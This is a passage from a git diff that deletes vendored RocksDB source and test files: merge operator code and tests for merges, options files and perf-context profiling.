-    operand_list_str.emplace_back(op.data(), op.size());
-  }
-  return FullMerge(merge_in.key, merge_in.existing_value, operand_list_str,
-                   &merge_out->new_value, merge_in.logger);
-}
-
-// The default implementation of PartialMergeMulti, which invokes
-// PartialMerge multiple times internally and merges two operands at
-// a time.
-bool MergeOperator::PartialMergeMulti(const Slice& key,
-                                      const std::deque<Slice>& operand_list,
-                                      std::string* new_value,
-                                      Logger* logger) const {
-  assert(operand_list.size() >= 2);
-  // Simply loop through the operands
-  Slice temp_slice(operand_list[0]);
-
-  for (size_t i = 1; i < operand_list.size(); ++i) {
-    auto& operand = operand_list[i];
-    std::string temp_value;
-    if (!PartialMerge(key, temp_slice, operand, &temp_value, logger)) {
-      return false;
-    }
-    swap(temp_value, *new_value);
-    temp_slice = Slice(*new_value);
-  }
-
-  // The result will be in *new_value. All merges succeeded.
-  return true;
-}
-
-// Given a "real" merge from the library, call the user's
-// associative merge function one-by-one on each of the operands.
-// NOTE: It is assumed that the client's merge-operator will handle any errors.
-bool AssociativeMergeOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Simply loop through the operands
-  Slice temp_existing;
-  const Slice* existing_value = merge_in.existing_value;
-  for (const auto& operand : merge_in.operand_list) {
-    std::string temp_value;
-    if (!Merge(merge_in.key, existing_value, operand, &temp_value,
-               merge_in.logger)) {
-      return false;
-    }
-    swap(temp_value, merge_out->new_value);
-    temp_existing = Slice(merge_out->new_value);
-    existing_value = &temp_existing;
-  }
-
-  // The result will be in *new_value. All merges succeeded.
-  return true;
-}
-
-// Call the user defined simple merge on the operands;
-// NOTE: It is assumed that the client's merge-operator will handle any errors.
-bool AssociativeMergeOperator::PartialMerge(
-    const Slice& key,
-    const Slice& left_operand,
-    const Slice& right_operand,
-    std::string* new_value,
-    Logger* logger) const {
-  return Merge(key, &left_operand, right_operand, new_value, logger);
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_test.cc b/thirdparty/rocksdb/db/merge_test.cc
deleted file mode 100644
index b6582b7..0000000
--- a/thirdparty/rocksdb/db/merge_test.cc
+++ /dev/null
@@ -1,517 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <assert.h>
-#include <memory>
-#include <iostream>
-
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "db/dbformat.h"
-#include "db/db_impl.h"
-#include "db/write_batch_internal.h"
-#include "utilities/merge_operators.h"
-#include "util/testharness.h"
-
-using namespace rocksdb;
-
-namespace {
-size_t num_merge_operator_calls;
-void resetNumMergeOperatorCalls() { num_merge_operator_calls = 0; }
-
-size_t num_partial_merge_calls;
-void resetNumPartialMergeCalls() { num_partial_merge_calls = 0; }
-}
-
-class CountMergeOperator : public AssociativeMergeOperator {
- public:
-  CountMergeOperator() {
-    mergeOperator_ = MergeOperators::CreateUInt64AddOperator();
-  }
-
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override {
-    assert(new_value->empty());
-    ++num_merge_operator_calls;
-    if (existing_value == nullptr) {
-      new_value->assign(value.data(), value.size());
-      return true;
-    }
-
-    return mergeOperator_->PartialMerge(
-        key,
-        *existing_value,
-        value,
-        new_value,
-        logger);
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    assert(new_value->empty());
-    ++num_partial_merge_calls;
-    return mergeOperator_->PartialMergeMulti(key, operand_list, new_value,
-                                             logger);
-  }
-
-  virtual const char* Name() const override {
-    return "UInt64AddOperator";
-  }
-
- private:
-  std::shared_ptr<MergeOperator> mergeOperator_;
-};
-
-namespace {
-std::shared_ptr<DB> OpenDb(const std::string& dbname, const bool ttl = false,
-                           const size_t max_successive_merges = 0) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = std::make_shared<CountMergeOperator>();
-  options.max_successive_merges = max_successive_merges;
-  Status s;
-  DestroyDB(dbname, Options());
-// DBWithTTL is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  if (ttl) {
-    std::cout << "Opening database with TTL\n";
-    DBWithTTL* db_with_ttl;
-    s = DBWithTTL::Open(options, dbname, &db_with_ttl);
-    db = db_with_ttl;
-  } else {
-    s = DB::Open(options, dbname, &db);
-  }
-#else
-  assert(!ttl);
-  s = DB::Open(options, dbname, &db);
-#endif  // !ROCKSDB_LITE
-  if (!s.ok()) {
-    std::cerr << s.ToString() << std::endl;
-    assert(false);
-  }
-  return std::shared_ptr<DB>(db);
-}
-}  // namespace
-
-// Imagine we are maintaining a set of uint64 counters.
-// Each counter has a distinct name. And we would like
-// to support four high level operations:
-// set, add, get and remove
-// This is a quick implementation without a Merge operation.
-class Counters {
-
- protected:
-  std::shared_ptr<DB> db_;
-
-  WriteOptions put_option_;
-  ReadOptions get_option_;
-  WriteOptions delete_option_;
-
-  uint64_t default_;
-
- public:
-  explicit Counters(std::shared_ptr<DB> db, uint64_t defaultCount = 0)
-      : db_(db),
-        put_option_(),
-        get_option_(),
-        delete_option_(),
-        default_(defaultCount) {
-    assert(db_);
-  }
-
-  virtual ~Counters() {}
-
-  // public interface of Counters.
-  // All four functions return false
-  // if the underlying level db operation failed.
-
-  // mapped to a levedb Put
-  bool set(const std::string& key, uint64_t value) {
-    // just treat the internal rep of int64 as the string
-    char buf[sizeof(value)];
-    EncodeFixed64(buf, value);
-    Slice slice(buf, sizeof(value));
-    auto s = db_->Put(put_option_, key, slice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // mapped to a rocksdb Delete
-  bool remove(const std::string& key) {
-    auto s = db_->Delete(delete_option_, key);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // mapped to a rocksdb Get
-  bool get(const std::string& key, uint64_t* value) {
-    std::string str;
-    auto s = db_->Get(get_option_, key, &str);
-
-    if (s.IsNotFound()) {
-      // return default value if not found;
-      *value = default_;
-      return true;
-    } else if (s.ok()) {
-      // deserialization
-      if (str.size() != sizeof(uint64_t)) {
-        std::cerr << "value corruption\n";
-        return false;
-      }
-      *value = DecodeFixed64(&str[0]);
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // 'add' is implemented as get -> modify -> set
-  // An alternative is a single merge operation, see MergeBasedCounters
-  virtual bool add(const std::string& key, uint64_t value) {
-    uint64_t base = default_;
-    return get(key, &base) && set(key, base + value);
-  }
-
-
-  // convenience functions for testing
-  void assert_set(const std::string& key, uint64_t value) {
-    assert(set(key, value));
-  }
-
-  void assert_remove(const std::string& key) { assert(remove(key)); }
-
-  uint64_t assert_get(const std::string& key) {
-    uint64_t value = default_;
-    int result = get(key, &value);
-    assert(result);
-    if (result == 0) exit(1); // Disable unused variable warning.
-    return value;
-  }
-
-  void assert_add(const std::string& key, uint64_t value) {
-    int result = add(key, value);
-    assert(result);
-    if (result == 0) exit(1); // Disable unused variable warning.
-  }
-};
-
-// Implement 'add' directly with the new Merge operation
-class MergeBasedCounters : public Counters {
- private:
-  WriteOptions merge_option_; // for merge
-
- public:
-  explicit MergeBasedCounters(std::shared_ptr<DB> db, uint64_t defaultCount = 0)
-      : Counters(db, defaultCount),
-        merge_option_() {
-  }
-
-  // mapped to a rocksdb Merge operation
-  virtual bool add(const std::string& key, uint64_t value) override {
-    char encoded[sizeof(uint64_t)];
-    EncodeFixed64(encoded, value);
-    Slice slice(encoded, sizeof(uint64_t));
-    auto s = db_->Merge(merge_option_, key, slice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << s.ToString() << std::endl;
-      return false;
-    }
-  }
-};
-
-namespace {
-void dumpDb(DB* db) {
-  auto it = unique_ptr<Iterator>(db->NewIterator(ReadOptions()));
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    uint64_t value = DecodeFixed64(it->value().data());
-    std::cout << it->key().ToString() << ": " << value << std::endl;
-  }
-  assert(it->status().ok());  // Check for any errors found during the scan
-}
-
-void testCounters(Counters& counters, DB* db, bool test_compaction) {
-
-  FlushOptions o;
-  o.wait = true;
-
-  counters.assert_set("a", 1);
-
-  if (test_compaction) db->Flush(o);
-
-  assert(counters.assert_get("a") == 1);
-
-  counters.assert_remove("b");
-
-  // defaut value is 0 if non-existent
-  assert(counters.assert_get("b") == 0);
-
-  counters.assert_add("a", 2);
-
-  if (test_compaction) db->Flush(o);
-
-  // 1+2 = 3
-  assert(counters.assert_get("a")== 3);
-
-  dumpDb(db);
-
-  std::cout << "1\n";
-
-  // 1+...+49 = ?
-  uint64_t sum = 0;
-  for (int i = 1; i < 50; i++) {
-    counters.assert_add("b", i);
-    sum += i;
-  }
-  assert(counters.assert_get("b") == sum);
-
-  std::cout << "2\n";
-  dumpDb(db);
-
-  std::cout << "3\n";
-
-  if (test_compaction) {
-    db->Flush(o);
-
-    std::cout << "Compaction started ...\n";
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    std::cout << "Compaction ended\n";
-
-    dumpDb(db);
-
-    assert(counters.assert_get("a")== 3);
-    assert(counters.assert_get("b") == sum);
-  }
-}
-
-void testSuccessiveMerge(Counters& counters, size_t max_num_merges,
-                         size_t num_merges) {
-
-  counters.assert_remove("z");
-  uint64_t sum = 0;
-
-  for (size_t i = 1; i <= num_merges; ++i) {
-    resetNumMergeOperatorCalls();
-    counters.assert_add("z", i);
-    sum += i;
-
-    if (i % (max_num_merges + 1) == 0) {
-      assert(num_merge_operator_calls == max_num_merges + 1);
-    } else {
-      assert(num_merge_operator_calls == 0);
-    }
-
-    resetNumMergeOperatorCalls();
-    assert(counters.assert_get("z") == sum);
-    assert(num_merge_operator_calls == i % (max_num_merges + 1));
-  }
-}
-
-void testPartialMerge(Counters* counters, DB* db, size_t max_merge,
-                      size_t min_merge, size_t count) {
-  FlushOptions o;
-  o.wait = true;
-
-  // Test case 1: partial merge should be called when the number of merge
-  //              operands exceeds the threshold.
-  uint64_t tmp_sum = 0;
-  resetNumPartialMergeCalls();
-  for (size_t i = 1; i <= count; i++) {
-    counters->assert_add("b", i);
-    tmp_sum += i;
-  }
-  db->Flush(o);
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(tmp_sum, counters->assert_get("b"));
-  if (count > max_merge) {
-    // in this case, FullMerge should be called instead.
-    ASSERT_EQ(num_partial_merge_calls, 0U);
-  } else {
-    // if count >= min_merge, then partial merge should be called once.
-    ASSERT_EQ((count >= min_merge), (num_partial_merge_calls == 1));
-  }
-
-  // Test case 2: partial merge should not be called when a put is found.
-  resetNumPartialMergeCalls();
-  tmp_sum = 0;
-  db->Put(rocksdb::WriteOptions(), "c", "10");
-  for (size_t i = 1; i <= count; i++) {
-    counters->assert_add("c", i);
-    tmp_sum += i;
-  }
-  db->Flush(o);
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(tmp_sum, counters->assert_get("c"));
-  ASSERT_EQ(num_partial_merge_calls, 0U);
-}
-
-void testSingleBatchSuccessiveMerge(DB* db, size_t max_num_merges,
-                                    size_t num_merges) {
-  assert(num_merges > max_num_merges);
-
-  Slice key("BatchSuccessiveMerge");
-  uint64_t merge_value = 1;
-  char buf[sizeof(merge_value)];
-  EncodeFixed64(buf, merge_value);
-  Slice merge_value_slice(buf, sizeof(merge_value));
-
-  // Create the batch
-  WriteBatch batch;
-  for (size_t i = 0; i < num_merges; ++i) {
-    batch.Merge(key, merge_value_slice);
-  }
-
-  // Apply to memtable and count the number of merges
-  resetNumMergeOperatorCalls();
-  {
-    Status s = db->Write(WriteOptions(), &batch);
-    assert(s.ok());
-  }
-  ASSERT_EQ(
-      num_merge_operator_calls,
-      static_cast<size_t>(num_merges - (num_merges % (max_num_merges + 1))));
-
-  // Get the value
-  resetNumMergeOperatorCalls();
-  std::string get_value_str;
-  {
-    Status s = db->Get(ReadOptions(), key, &get_value_str);
-    assert(s.ok());
-  }
-  assert(get_value_str.size() == sizeof(uint64_t));
-  uint64_t get_value = DecodeFixed64(&get_value_str[0]);
-  ASSERT_EQ(get_value, num_merges * merge_value);
-  ASSERT_EQ(num_merge_operator_calls,
-            static_cast<size_t>((num_merges % (max_num_merges + 1))));
-}
-
-void runTest(int argc, const std::string& dbname, const bool use_ttl = false) {
-  bool compact = false;
-  if (argc > 1) {
-    compact = true;
-    std::cout << "Turn on Compaction\n";
-  }
-
-  {
-    auto db = OpenDb(dbname, use_ttl);
-
-    {
-      std::cout << "Test read-modify-write counters... \n";
-      Counters counters(db, 0);
-      testCounters(counters, db.get(), true);
-    }
-
-    {
-      std::cout << "Test merge-based counters... \n";
-      MergeBasedCounters counters(db, 0);
-      testCounters(counters, db.get(), compact);
-    }
-  }
-
-  DestroyDB(dbname, Options());
-
-  {
-    std::cout << "Test merge in memtable... \n";
-    size_t max_merge = 5;
-    auto db = OpenDb(dbname, use_ttl, max_merge);
-    MergeBasedCounters counters(db, 0);
-    testCounters(counters, db.get(), compact);
-    testSuccessiveMerge(counters, max_merge, max_merge * 2);
-    testSingleBatchSuccessiveMerge(db.get(), 5, 7);
-    DestroyDB(dbname, Options());
-  }
-
-  {
-    std::cout << "Test Partial-Merge\n";
-    size_t max_merge = 100;
-    // Min merge is hard-coded to 2.
-    uint32_t min_merge = 2;
-    for (uint32_t count = min_merge - 1; count <= min_merge + 1; count++) {
-      auto db = OpenDb(dbname, use_ttl, max_merge);
-      MergeBasedCounters counters(db, 0);
-      testPartialMerge(&counters, db.get(), max_merge, min_merge, count);
-      DestroyDB(dbname, Options());
-    }
-    {
-      auto db = OpenDb(dbname, use_ttl, max_merge);
-      MergeBasedCounters counters(db, 0);
-      testPartialMerge(&counters, db.get(), max_merge, min_merge,
-                       min_merge * 10);
-      DestroyDB(dbname, Options());
-    }
-  }
-
-  {
-    std::cout << "Test merge-operator not set after reopen\n";
-    {
-      auto db = OpenDb(dbname);
-      MergeBasedCounters counters(db, 0);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-
-    DB* reopen_db;
-    ASSERT_OK(DB::Open(Options(), dbname, &reopen_db));
-    std::string value;
-    ASSERT_TRUE(!(reopen_db->Get(ReadOptions(), "test-key", &value).ok()));
-    delete reopen_db;
-    DestroyDB(dbname, Options());
-  }
-
-  /* Temporary remove this test
-  {
-    std::cout << "Test merge-operator not set after reopen (recovery case)\n";
-    {
-      auto db = OpenDb(dbname);
-      MergeBasedCounters counters(db, 0);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-      counters.add("test-key", 1);
-    }
-
-    DB* reopen_db;
-    ASSERT_TRUE(DB::Open(Options(), dbname, &reopen_db).IsInvalidArgument());
-  }
-  */
-}
-}  // namespace
-
-int main(int argc, char *argv[]) {
-  //TODO: Make this test like a general rocksdb unit-test
-  rocksdb::port::InstallStackTraceHandler();
-  runTest(argc, test::TmpDir() + "/merge_testdb");
-// DBWithTTL is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  runTest(argc, test::TmpDir() + "/merge_testdbttl", true); // Run test on TTL database
-#endif  // !ROCKSDB_LITE
-  printf("Passed all tests!\n");
-  return 0;
-}
diff --git a/thirdparty/rocksdb/db/options_file_test.cc b/thirdparty/rocksdb/db/options_file_test.cc
deleted file mode 100644
index fc62840..0000000
--- a/thirdparty/rocksdb/db/options_file_test.cc
+++ /dev/null
@@ -1,119 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <string>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-class OptionsFileTest : public testing::Test {
- public:
-  OptionsFileTest() : dbname_(test::TmpDir() + "/options_file_test") {}
-
-  std::string dbname_;
-};
-
-namespace {
-void UpdateOptionsFiles(DB* db,
-                        std::unordered_set<std::string>* filename_history,
-                        int* options_files_count) {
-  std::vector<std::string> filenames;
-  db->GetEnv()->GetChildren(db->GetName(), &filenames);
-  uint64_t number;
-  FileType type;
-  *options_files_count = 0;
-  for (auto filename : filenames) {
-    if (ParseFileName(filename, &number, &type) && type == kOptionsFile) {
-      filename_history->insert(filename);
-      (*options_files_count)++;
-    }
-  }
-}
-
-// Verify whether the current Options Files are the latest ones.
-void VerifyOptionsFileName(
-    DB* db, const std::unordered_set<std::string>& past_filenames) {
-  std::vector<std::string> filenames;
-  std::unordered_set<std::string> current_filenames;
-  db->GetEnv()->GetChildren(db->GetName(), &filenames);
-  uint64_t number;
-  FileType type;
-  for (auto filename : filenames) {
-    if (ParseFileName(filename, &number, &type) && type == kOptionsFile) {
-      current_filenames.insert(filename);
-    }
-  }
-  for (auto past_filename : past_filenames) {
-    if (current_filenames.find(past_filename) != current_filenames.end()) {
-      continue;
-    }
-    for (auto filename : current_filenames) {
-      ASSERT_GT(filename, past_filename);
-    }
-  }
-}
-}  // namespace
-
-TEST_F(OptionsFileTest, NumberOfOptionsFiles) {
-  const int kReopenCount = 20;
-  Options opt;
-  opt.create_if_missing = true;
-  DestroyDB(dbname_, opt);
-  std::unordered_set<std::string> filename_history;
-  DB* db;
-  for (int i = 0; i < kReopenCount; ++i) {
-    ASSERT_OK(DB::Open(opt, dbname_, &db));
-    int num_options_files = 0;
-    UpdateOptionsFiles(db, &filename_history, &num_options_files);
-    ASSERT_GT(num_options_files, 0);
-    ASSERT_LE(num_options_files, 2);
-    // Make sure we always keep the latest option files.
-    VerifyOptionsFileName(db, filename_history);
-    delete db;
-  }
-}
-
-TEST_F(OptionsFileTest, OptionsFileName) {
-  const uint64_t kOptionsFileNum = 12345;
-  uint64_t number;
-  FileType type;
-
-  auto options_file_name = OptionsFileName("", kOptionsFileNum);
-  ASSERT_TRUE(ParseFileName(options_file_name, &number, &type, nullptr));
-  ASSERT_EQ(type, kOptionsFile);
-  ASSERT_EQ(number, kOptionsFileNum);
-
-  const uint64_t kTempOptionsFileNum = 54352;
-  auto temp_options_file_name = TempOptionsFileName("", kTempOptionsFileNum);
-  ASSERT_TRUE(ParseFileName(temp_options_file_name, &number, &type, nullptr));
-  ASSERT_NE(temp_options_file_name.find(kTempFileNameSuffix),
-            std::string::npos);
-  ASSERT_EQ(type, kTempFile);
-  ASSERT_EQ(number, kTempOptionsFileNum);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-}
-#else
-
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped as Options file is not supported in RocksDBLite.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/perf_context_test.cc b/thirdparty/rocksdb/db/perf_context_test.cc
deleted file mode 100644
index d06843a..0000000
--- a/thirdparty/rocksdb/db/perf_context_test.cc
+++ /dev/null
@@ -1,705 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <algorithm>
-#include <iostream>
-#include <thread>
-#include <vector>
-
-#include "monitoring/histogram.h"
-#include "monitoring/instrumented_mutex.h"
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-
-bool FLAGS_random_key = false;
-bool FLAGS_use_set_based_memetable = false;
-int FLAGS_total_keys = 100;
-int FLAGS_write_buffer_size = 1000000000;
-int FLAGS_max_write_buffer_number = 8;
-int FLAGS_min_write_buffer_number_to_merge = 7;
-bool FLAGS_verbose = false;
-
-// Path to the database on file system
-const std::string kDbName = rocksdb::test::TmpDir() + "/perf_context_test";
-
-namespace rocksdb {
-
-std::shared_ptr<DB> OpenDb(bool read_only = false) {
-    DB* db;
-    Options options;
-    options.create_if_missing = true;
-    options.max_open_files = -1;
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-
-    if (FLAGS_use_set_based_memetable) {
-#ifndef ROCKSDB_LITE
-      options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(0));
-      options.memtable_factory.reset(NewHashSkipListRepFactory());
-#endif  // ROCKSDB_LITE
-    }
-
-    Status s;
-    if (!read_only) {
-      s = DB::Open(options, kDbName, &db);
-    } else {
-      s = DB::OpenForReadOnly(options, kDbName, &db);
-    }
-    EXPECT_OK(s);
-    return std::shared_ptr<DB>(db);
-}
-
-class PerfContextTest : public testing::Test {};
-
-TEST_F(PerfContextTest, SeekIntoDeletion) {
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    db->Put(write_options, key, value);
-  }
-
-  for (int i = 0; i < FLAGS_total_keys -1 ; ++i) {
-    std::string key = "k" + ToString(i);
-    db->Delete(write_options, key);
-  }
-
-  HistogramImpl hist_get;
-  HistogramImpl hist_get_time;
-  for (int i = 0; i < FLAGS_total_keys - 1; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value;
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default());
-    timer.Start();
-    auto status = db->Get(read_options, key, &value);
-    auto elapsed_nanos = timer.ElapsedNanos();
-    ASSERT_TRUE(status.IsNotFound());
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-    hist_get_time.Add(elapsed_nanos);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Get user key comparison: \n" << hist_get.ToString()
-              << "Get time: \n" << hist_get_time.ToString();
-  }
-
-  {
-    HistogramImpl hist_seek_to_first;
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default(), true);
-    iter->SeekToFirst();
-    hist_seek_to_first.Add(get_perf_context()->user_key_comparison_count);
-    auto elapsed_nanos = timer.ElapsedNanos();
-
-    if (FLAGS_verbose) {
-      std::cout << "SeekToFirst uesr key comparison: \n"
-                << hist_seek_to_first.ToString()
-                << "ikey skipped: " << get_perf_context()->internal_key_skipped_count
-                << "\n"
-                << "idelete skipped: "
-                << get_perf_context()->internal_delete_skipped_count << "\n"
-                << "elapsed: " << elapsed_nanos << "\n";
-    }
-  }
-
-  HistogramImpl hist_seek;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    std::string key = "k" + ToString(i);
-
-    get_perf_context()->Reset();
-    StopWatchNano timer(Env::Default(), true);
-    iter->Seek(key);
-    auto elapsed_nanos = timer.ElapsedNanos();
-    hist_seek.Add(get_perf_context()->user_key_comparison_count);
-    if (FLAGS_verbose) {
-      std::cout << "seek cmp: " << get_perf_context()->user_key_comparison_count
-                << " ikey skipped " << get_perf_context()->internal_key_skipped_count
-                << " idelete skipped "
-                << get_perf_context()->internal_delete_skipped_count
-                << " elapsed: " << elapsed_nanos << "ns\n";
-    }
-
-    get_perf_context()->Reset();
-    ASSERT_TRUE(iter->Valid());
-    StopWatchNano timer2(Env::Default(), true);
-    iter->Next();
-    auto elapsed_nanos2 = timer2.ElapsedNanos();
-    if (FLAGS_verbose) {
-      std::cout << "next cmp: " << get_perf_context()->user_key_comparison_count
-                << "elapsed: " << elapsed_nanos2 << "ns\n";
-    }
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Seek uesr key comparison: \n" << hist_seek.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, StopWatchNanoOverhead) {
-  // profile the timer cost by itself!
-  const int kTotalIterations = 1000000;
-  std::vector<uint64_t> timings(kTotalIterations);
-
-  StopWatchNano timer(Env::Default(), true);
-  for (auto& timing : timings) {
-    timing = timer.ElapsedNanos(true /* reset */);
-  }
-
-  HistogramImpl histogram;
-  for (const auto timing : timings) {
-    histogram.Add(timing);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << histogram.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, StopWatchOverhead) {
-  // profile the timer cost by itself!
-  const int kTotalIterations = 1000000;
-  uint64_t elapsed = 0;
-  std::vector<uint64_t> timings(kTotalIterations);
-
-  StopWatch timer(Env::Default(), nullptr, 0, &elapsed);
-  for (auto& timing : timings) {
-    timing = elapsed;
-  }
-
-  HistogramImpl histogram;
-  uint64_t prev_timing = 0;
-  for (const auto timing : timings) {
-    histogram.Add(timing - prev_timing);
-    prev_timing = timing;
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << histogram.ToString();
-  }
-}
-
-void ProfileQueries(bool enabled_time = false) {
-  DestroyDB(kDbName, Options());    // Start this test with a fresh DB
-
-  auto db = OpenDb();
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  HistogramImpl hist_put;
-
-  HistogramImpl hist_get;
-  HistogramImpl hist_get_snapshot;
-  HistogramImpl hist_get_memtable;
-  HistogramImpl hist_get_files;
-  HistogramImpl hist_get_post_process;
-  HistogramImpl hist_num_memtable_checked;
-
-  HistogramImpl hist_mget;
-  HistogramImpl hist_mget_snapshot;
-  HistogramImpl hist_mget_memtable;
-  HistogramImpl hist_mget_files;
-  HistogramImpl hist_mget_post_process;
-  HistogramImpl hist_mget_num_memtable_checked;
-
-  HistogramImpl hist_write_pre_post;
-  HistogramImpl hist_write_wal_time;
-  HistogramImpl hist_write_memtable_time;
-
-  uint64_t total_db_mutex_nanos = 0;
-
-  if (FLAGS_verbose) {
-    std::cout << "Inserting " << FLAGS_total_keys << " key/value pairs\n...\n";
-  }
-
-  std::vector<int> keys;
-  const int kFlushFlag = -1;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    keys.push_back(i);
-    if (i == FLAGS_total_keys / 2) {
-      // Issuing a flush in the middle.
-      keys.push_back(kFlushFlag);
-    }
-  }
-
-  if (FLAGS_random_key) {
-    std::random_shuffle(keys.begin(), keys.end());
-  }
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 1U);
-#endif
-  int num_mutex_waited = 0;
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      FlushOptions fo;
-      db->Flush(fo);
-      continue;
-    }
-
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    db->Put(write_options, key, value);
-    if (++num_mutex_waited > 3) {
-#ifndef NDEBUG
-      ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0U);
-#endif
-    }
-    hist_write_pre_post.Add(get_perf_context()->write_pre_and_post_process_time);
-    hist_write_wal_time.Add(get_perf_context()->write_wal_time);
-    hist_write_memtable_time.Add(get_perf_context()->write_memtable_time);
-    hist_put.Add(get_perf_context()->user_key_comparison_count);
-    total_db_mutex_nanos += get_perf_context()->db_mutex_lock_nanos;
-  }
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0U);
-#endif
-
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      continue;
-    }
-    std::string key = "k" + ToString(i);
-    std::string expected_value = "v" + ToString(i);
-    std::string value;
-
-    std::vector<Slice> multiget_keys = {Slice(key)};
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    ASSERT_OK(db->Get(read_options, key, &value));
-    ASSERT_EQ(expected_value, value);
-    hist_get_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_get_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_get_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_get_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-
-    get_perf_context()->Reset();
-    db->MultiGet(read_options, multiget_keys, &values);
-    hist_mget_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_mget_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_mget_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_mget_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_mget_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_mget.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
